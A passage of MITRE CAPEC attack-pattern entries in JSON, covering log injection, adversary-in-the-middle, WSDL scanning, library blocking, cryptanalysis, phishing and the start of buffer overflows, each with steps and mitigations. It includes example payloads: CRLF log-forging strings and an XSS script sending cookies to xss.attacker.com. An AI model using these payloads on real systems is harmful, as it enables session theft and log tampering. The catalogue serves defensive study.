tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"268","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"592"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine Application\'s Log File Format] The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.","Technique":["Determine logging utility being used by application (e.g. log4j)","Gain access to application\'s source code to determine log file formats.","Install or obtain access to instance of application and observe its log file format."]},{"Step":"2","Phase":"Exploit","Description":"[Manipulate Log Files] The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.","Technique":[{"p":["Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:","may add the following forged entry into a log file:","Different applications may require different encodings of the carriage return and line feed characters."],"div":["\\"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in\\"",{"style":"margin-left:10px;","class":"attack"},"\\"[Thu Nov 12 12:11:22]:Info: User admin logged in\\"",{"style":"margin-left:10px;","class":"result"}]},{"p":["Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator\'s cookie and will be able to gain access as that user. For example, a log file entry could contain","The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page)."],"div":["<script>new Image().src=\\"http://xss.attacker.com/log_cookie?cookie=\\"+encodeURI(document.cookie);<\/script>",{"style":"margin-left:10px;","class":"attack"}]}]}]},"Prerequisites":{"Prerequisite":["The target host is logging the action and data of the user.","The target host insufficiently protects access to the logs or logging mechanisms."]},"Skills_Required":{"Skill":["This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.",{"Level":"Low"},"A more sophisticated attack can try to defeat the input validation mechanism.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Data"}},"Mitigations":{"Mitigation":["Carefully control access to physical log files.","Do not allow tainted data to be written in the log file without prior input validation. An allowlist may be used to properly validate the data.","Use synchronization to control the flow of execution.","Use static analysis tools to identify log forging vulnerabilities.","Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells."]},"Example_Instances":{"Example":["Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. See also: CVE-2006-0201",{"p":["If a user submits the string \\"twenty-one\\" for val, the following entry is logged:","However, if an attacker submits the string","the following entry is logged:","Clearly, attackers can use this same mechanism to insert arbitrary log entries."],"div":["INFO: Failed to parse val=twenty-one",{"style":"margin-left:10px;","class":"result"},"twenty-one%0a%0aINFO:+User+logged+out%3dbadguy",{"style":"margin-left:10px;","class":"attack"},"INFO: Failed to parse val=twenty-one",{"style":"margin-left:10px;","class":"result"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"117"},{"CWE_ID":"75"},{"CWE_ID":"150"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1070","Entry_Name":"Indicator Removal on Host"}},"References":{"Reference":[{"External_Reference_ID":"REF-131"},{"External_Reference_ID":"REF-550"},{"External_Reference_ID":"REF-551","Section":"Log injection"},{"External_Reference_ID":"REF-552","Section":"Test Case ID 1579"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"94":{"ID":"94","Name":"Adversary in the Middle (AiTM)","Abstraction":"Meta","Status":"Stable","Description":{"p":["An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components. Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first flows through the adversary, who has the opportunity to observe or alter it, before being passed on to the intended recipient as if it was never observed. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for these attacks yields an implicit lack of trust in communication or identify between two components.","These attacks differ from Sniffing Attacks (CAPEC-157) since these attacks often modify the communications prior to delivering it to the intended recipient."]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Man-in-the-Middle / MITM"},{"Term":"Person-in-the-Middle / PiTM"},{"Term":"Monkey-in-the-Middle"},{"Term":"Monster-in-the-Middle"},{"Term":"On-path Attacker"}]},"Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"668"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"The attacker probes to determine the nature and mechanism of communication between two components looking for opportunities to exploit."},{"Step":"2","Phase":"Experiment","Description":"The attacker inserts themself into the communication channel initially acting as a routing proxy between the two targeted components. The attacker may or may not have to use cryptography."},{"Step":"3","Phase":"Exploit","Description":"The attacker observes, filters, or alters passed data of its choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes."}]},"Prerequisites":{"Prerequisite":["There are two components communicating with each other.","An attacker is able to identify the nature and mechanism of communication between the two target components.","An attacker can eavesdrop on the communication between the target components.","Strong mutual authentication is not used between the two target components yielding opportunity for attacker interposition.","The communication occurs in clear (not encrypted) or with insufficient and spoofable encryption."]},"Skills_Required":{"Skill":["This attack can get sophisticated since the attack may use cryptography.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Ensure Public Keys are signed by a Certificate Authority","Encrypt communications using cryptography (e.g., SSL/TLS)","Use Strong mutual authentication to always fully authenticate both ends of any communications channel.","Exchange public keys using a secure channel"]},"Example_Instances":{"Example":{"p":"In 2017, security researcher Jerry Decime discovered that Equifax mobile applications were not leveraging HTTPS in all areas. Although authentication was properly utilizing HTTPS, in addition to validating the root of trust of the server certificate, other areas of the application were using HTTP to communicate. Adversaries could then conduct MITM attacks on rogue WiFi or cellular networks and hijack the UX. This further allowed the adversaries to prompt users for sensitive data, which could then be obtained in the plaintext response. [REF-636]"}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"300"},{"CWE_ID":"290"},{"CWE_ID":"593"},{"CWE_ID":"287"},{"CWE_ID":"294"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1557","Entry_Name":"Man-in-the-Middle"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Man-in-the-middle attack"}]},"References":{"Reference":[{"External_Reference_ID":"REF-553"},{"External_Reference_ID":"REF-633"},{"External_Reference_ID":"REF-634"},{"External_Reference_ID":"REF-635"},{"External_Reference_ID":"REF-636"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Examples-Instances, Related_Vulnerabilities"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Example_Instances, Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Description, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated @Name, @Status, Alternate_Terms, Description, Example_Instances, Execution_Flow, Mitigations, References, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"}],"Previous_Entry_Name":["Man in the Middle Attack",{"Date":"2021-06-24"}]}},"95":{"ID":"95","Name":"WSDL Scanning","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"54"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Scan for WSDL Documents] The adversary scans for WSDL documents. The WDSL document written in XML is like a handbook on how to communicate with the web services provided by the target host. It provides an open view of the application (function details, purpose, functional break down, entry points, message types, etc.). This is very useful information for the adversary."},{"Step":"2","Phase":"Experiment","Description":"[Analyze WSDL files] An adversary will analyze the WSDL files and try to find potential weaknesses by sending messages matching the pattern described in the WSDL file. The adversary could run through all of the operations with different message request patterns until a breach is identified."},{"Step":"3","Phase":"Exploit","Description":"[Craft malicious content] Once an adversary finds a potential weakness, they can craft malicious content to be sent to the system. For instance the adversary may try to submit special characters and observe how the system reacts to an invalid request. The message sent by the adversary may not be XML validated and cause unexpected behavior."}]},"Prerequisites":{"Prerequisite":["A client program connecting to a web service can read the WSDL to determine what functions are available on the server.","The target host exposes vulnerable functions within its WSDL interface."]},"Skills_Required":{"Skill":["This attack can be as simple as reading WSDL and starting sending invalid request.",{"Level":"Low"},"This attack can be used to perform more sophisticated attacks (SQL injection, etc.)",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["It is important to protect WSDL file or provide limited access to it.","Review the functions exposed by the WSDL interface (especially if you have used a tool to generate it). Make sure that none of them is vulnerable to injection.","Ensure the WSDL does not expose functions and APIs that were not intended to be exposed.","Pay attention to the function naming convention (within the WSDL interface). Easy to guess function name may be an entry point for attack.","Validate the received messages against the WSDL Schema. Incomplete solution."]},"Example_Instances":{"Example":["A WSDL interface may expose a function vulnerable to SQL Injection.",{"p":["The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.","Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.","Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.","Source : \\"Seven Steps to XML Mastery, Step 7: Ensure XML Security\\", Frank Coyle. See reference section."]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"538"}},"References":{"Reference":[{"External_Reference_ID":"REF-554"},{"External_Reference_ID":"REF-555","Section":"Step 7: Ensure XML Security"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"96":{"ID":"96","Name":"Block Access to Libraries","Abstraction":"Detailed","Status":"Draft","Description":"An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. It is possible that the application does not handle situations properly where access to these libraries has been blocked. Depending on the error handling within the application, blocked access to libraries may leave the system in an insecure state that could be leveraged by an attacker.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"603","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Determine what external libraries the application accesses."},{"Step":"2","Phase":"Experiment","Description":"Block access to the external libraries accessed by the application."},{"Step":"3","Phase":"Experiment","Description":"Monitor the behavior of the system to see if it goes into an insecure/inconsistent state."},{"Step":"4","Phase":"Experiment","Description":"If the system does go into an insecure/inconsistent state, leverage that to obtain information about the system functionality or data, elevate access control, etc. The rest of this attack will depend on the context and the desired goal."}]},"Prerequisites":{"Prerequisite":["An application requires access to external libraries.","An attacker has the privileges to block application access to external libraries."]},"Skills_Required":{"Skill":["Knowledge of how to block access to libraries, as well as knowledge of how to leverage the resulting state of the application based on the failed call.",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Alter Execution Logic"},{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":"Ensure that application handles situations where access to APIs in external libraries is not available securely. If the application cannot continue its execution safely it should fail in a consistent and secure fashion."},"Example_Instances":{"Example":"A web-based system uses a third party cryptographic random number generation library that derives entropy from machine\'s hardware. This library is used in generation of user session ids used by the application. If the library is inaccessible, the application instead uses a software based weak pseudo random number generation library. An attacker of the system blocks access of the application to the third party cryptographic random number generation library (by renaming it). The application in turn uses the weak pseudo random number generation library to generate session ids that are predictable. An attacker then leverages this weakness to guess a session id of another user to perform a horizontal elevation of privilege escalation and gain access to another user\'s account."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"589"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"97":{"ID":"97","Name":"Cryptanalysis","Abstraction":"Standard","Status":"Draft","Description":"Cryptanalysis is a process of finding weaknesses in cryptographic algorithms and using these weaknesses to decipher the ciphertext without knowing the secret key (instance deduction). Sometimes the weakness is not in the cryptographic algorithm itself, but rather in how it is applied that makes cryptanalysis successful. An attacker may have other goals as well, such as: Total Break (finding the secret key), Global Deduction (finding a functionally equivalent algorithm for encryption and decryption that does not require knowledge of the secret key), Information Deduction (gaining some information about plaintexts or ciphertexts that was not previously known) and Distinguishing Algorithm (the attacker has the ability to distinguish the output of the encryption (ciphertext) from a random permutation of bits).","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"192"},{"Nature":"CanPrecede","CAPEC_ID":"20"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"An attacker discovers a weakness in the cryptographic algorithm or a weakness in how it was applied to a particular chunk of plaintext."},{"Step":"2","Phase":"Exploit","Description":"An attacker leverages the discovered weakness to decrypt, partially decrypt or infer some information about the contents of the encrypted message. All of that is done without knowing the secret key."}]},"Prerequisites":{"Prerequisite":["The target software utilizes some sort of cryptographic algorithm.","An underlying weaknesses exists either in the cryptographic algorithm used or in the way that it was applied to a particular chunk of plaintext.","The encryption algorithm is known to the attacker.","An attacker has access to the ciphertext."]},"Skills_Required":{"Skill":["Cryptanalysis generally requires a very significant level of understanding of mathematics and computation.",{"Level":"High"}]},"Resources_Required":{"Resource":"Computing resource requirements will vary based on the complexity of a given cryptanalysis technique. Access to the encryption/decryption routines of the algorithm is also required."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"In most cases, if cryptanalysis is successful at all, an adversary will not be able to decrypt the entire message, but instead will only be able to deduce some information about the plaintext. However, that may be sufficient for an adversary, depending on the context of the attack."}},"Mitigations":{"Mitigation":["Use proven cryptographic algorithms with recommended key sizes.",{"p":"Ensure that the algorithms are used properly. That means:","div":{"style":"margin-left:10px;","ul":{"li":["1. Not rolling out your own crypto; Use proven algorithms and implementations.","2. Choosing initialization vectors with sufficiently random numbers","3. Generating key material using good sources of randomness and avoiding known weak keys","4. Using proven protocols and their implementations.","5. Picking the most appropriate cryptographic algorithm for your usage context and data"]}}}]},"Example_Instances":{"Example":"A very easy to understand example is a cryptanalysis technique called frequency analysis that can be successfully applied to the very basic classic encryption algorithms that performed mono-alphabetic substitution replacing each letter in the plaintext with its predetermined mapping letter from the same alphabet. This was considered an improvement over a more basic technique that would simply shift all of the letters of the plaintext by some constant number of positions and replace the original letters with the new letter with the resultant alphabet position. While mono-alphabetic substitution ciphers are resilient to blind brute force, they can be broken easily with nothing more than a pen and paper. Frequency analysis uses the fact that natural language is not random and mono-alphabetic substitution does not hide the statistical properties of the natural language. So if the letter \\"E\\" in an English language occurs with a certain known frequency (about 12.7%), whatever \\"E\\" was substituted with to get to the ciphertext, will occur with the similar frequency. Having this frequency information allows the cryptanalyst to quickly determine the substitutions and decipher the ciphertext. Frequency analysis techniques are not applicable to modern ciphers as they are all resilient to it (unless this is a very bad case of a homegrown encryption algorithm). This example is inapplicable to modern cryptographic ciphers but is here to illustrate a rudimentary example of cryptanalysis."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"327"},{"CWE_ID":"1204"},{"CWE_ID":"1240"},{"CWE_ID":"1241"},{"CWE_ID":"1279"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Cryptanalysis"}},"References":{"Reference":{"External_Reference_ID":"REF-556","Section":"Cryptanalysis"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Description, Description Summary, Examples-Instances, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"98":{"ID":"98","Name":"Phishing","Abstraction":"Standard","Status":"Draft","Description":"Phishing is a social engineering technique where an attacker masquerades as a legitimate entity with which the victim might do business in order to prompt the user to reveal some confidential information (very frequently authentication credentials) that can later be used by an attacker. Phishing is essentially a form of information gathering or \\"fishing\\" for information.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"151","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"}]},{"Nature":"CanPrecede","CAPEC_ID":"89"},{"Nature":"CanPrecede","CAPEC_ID":"543"},{"Nature":"CanPrecede","CAPEC_ID":"611"},{"Nature":"CanPrecede","CAPEC_ID":"630"},{"Nature":"CanPrecede","CAPEC_ID":"631"},{"Nature":"CanPrecede","CAPEC_ID":"632"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Obtain domain name and certificate to spoof legitimate site] This optional step can be used to help the attacker impersonate the legitimate site more convincingly. The attacker can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.","Technique":["Optionally obtain a domain name that visually looks similar to the legitimate site\'s domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)","Optionally obtain a legitimate SSL certificate for the new domain name."]},{"Step":"2","Phase":"Explore","Description":"[Explore legitimate website and create duplicate] An attacker creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.","Technique":["Use spidering software to get copy of web pages on legitimate site.","Manually save copies of required web pages from legitimate site.","Create new web pages that have the legitimate site\'s look and feel, but contain completely new content."]},{"Step":"3","Phase":"Exploit","Description":"[Convince user to enter sensitive information on attacker\'s site.] An attacker sends an e-mail to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to attacker\'s website) and log in. The key is to get the victim to believe that the e-mail is coming from a legitimate entity with which the victim does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.","Technique":["Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.","Place phishing link in post to online forum."]},{"Step":"4","Phase":"Exploit","Description":"[Use stolen credentials to log into legitimate site] Once the attacker captures some sensitive information through phishing (login credentials, credit card information, etc.) the attacker can leverage this information. For instance, the attacker can use the victim\'s login credentials to log into their bank account and transfer money to an account of their choice.","Technique":"Log in to the legitimate site using another user\'s supplied credentials"}]},"Prerequisites":{"Prerequisite":["An attacker needs to have a way to initiate contact with the victim. Typically that will happen through e-mail.","An attacker needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \\"hooks\\" to many potential victims.","An attacker needs to have a sufficiently compelling call to action to prompt the user to take action.","The replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity."]},"Skills_Required":{"Skill":["Basic knowledge about websites: obtaining them, designing and implementing them, etc.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Some web development tools to put up a fake website."},"Indicators":{"Indicator":["You receive an e-mail from an entity that you are not even a customer of prompting you to log into your account.","You receive any e-mail that provides you with a link which takes you to a website on which you need to enter your log in information."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":"Do not follow any links that you receive within your e-mails and certainly do not input any login credentials on the page that they take you too. Instead, call your Bank, PayPal, eBay, etc., and inquire about the problem. A safe practice would also be to type the URL of your bank in the browser directly and only then log in. Also, never reply to any e-mails that ask you to provide sensitive information of any kind."},"Example_Instances":{"Example":["The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. An attacker has just collected the target\'s online banking information which can now be used by the attacker to log into the target\'s bank account and transfer money to a bank account of the attackers\' choice.","An adversary may use BlueJacking, or Bluetooth Phishing to send unsolicited contact cards, messages, or pictures to nearby devices that are listening via Bluetooth. These messages may contain phishing content."]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1566","Entry_Name":"Phishing"}},"References":{"Reference":{"External_Reference_ID":"REF-656"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Example_Instances, Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances, References"}]}},"100":{"ID":"100","Name":"Overflow Buffers","Abstraction":"Standard","Status":"Draft","Description":"Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an adversary. As a consequence, an adversary is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the adversaries\' choice.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"123"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":"Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary injects the crafted overflow content into the buffer."}]},"Prerequisites":{"Prerequisite":["Targeted software performs buffer operations.","Targeted software inadequately performs bounds-checking on buffer operations.","Adversary has the capability to influence the input to buffer operations."]},"Skills_Required":{"Skill":["In most cases, overflowing a buffer does not require advanced skills beyond the ability to notice an overflow and stuff an input variable with content.",{"Level":"Low"},"In cases of directed overflows, where the motive is to divert the flow of the program or application as per the adversaries\' bidding, high level skills are required. This may involve detailed knowledge of the target system architecture and kernel.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. Detecting and exploiting a buffer overflow does not require any resources beyond knowledge of and access to the target system."},"Indicators":{"Indicator":"An attack designed to leverage a buffer overflow and redirect execution as per the adversary\'s bidding is fairly difficult to detect. An attack aimed solely at bringing the system down is usually preceded by a barrage of long inputs that make no sense. In either case, it is likely that the adversary would have resorted to a few hit-or-miss attempts that will be recorded in the system event logs, if they exist."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Use a language or compiler that performs automatic bounds checking.","Use secure functions not vulnerable to buffer overflow.","If you have to use dangerous functions, make sure that you do boundary checking.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Use OS-level preventative functionality. Not a complete solution.","Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the 